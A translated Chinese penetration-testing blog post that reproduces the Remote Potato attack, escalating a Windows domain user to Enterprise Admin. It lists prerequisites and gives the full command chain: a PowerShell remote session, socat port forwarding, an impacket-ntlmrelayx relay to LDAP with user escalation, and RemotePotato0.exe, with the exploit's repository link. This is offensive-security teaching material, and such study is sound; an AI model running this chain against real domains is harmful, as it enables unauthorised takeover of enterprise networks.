Remote Potato – From Domain User to Enterprise Admin
Remote Potato – From Domain User to Enterprise Admin
鸿鹄实验室
发布于 2021-05-27 15:14:24
发布于 2021-05-27 15:14:24
文章被收录于专栏:鸿鹄实验室
本文为翻译文,如有需要可查看原文:
https://pentestlab.blog/2021/05/04/remote-potato-from-domain-user-to-enterprise-admin/
前言
如需复现该漏洞,我们需要开启PS远程管理,开启方法如下
Enable-PSremoting
set-item wsman:localhost\client\trustedhosts -value可以使用下面的命令来查看我们的目标配置:
Get-PSSessionConfiguration
如有需要,可将指定用户加入到指定组中:
所以该攻击的前提为:
- 具有Domain Administrator特权的用户实际上已登录到主机或通过远程桌面登录
- 攻击者已获得对主机的初始访问权限,或者已通过WinRM或SSH访问
- LDAP和SMB签名未配置
复现
首先使用下面的命令与目标主机建立链接
Enter-PSSession -ComputerName 10.0.0.2 -Authentication Negotiate -Credential $(get-credential)
然后使用socat 进行转发:
sudo stty -tostop
sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.2:9998 &
然后进行中继
impacket-ntlmrelayx -t ldap://10.0.0.1 --no-wcf-server --escalate-user pentestlab
然后在目标机器上执行remote potato
RemotePotato0.exe -r 10.0.0.3 -p 9998
若成功则用户会被加入到Enterprise Admins组
此时便可以使用任何的横向移动工具获取system权限:
exploit地址:https://github.com/antonioCoco/RemotePotato0
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-05-07,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
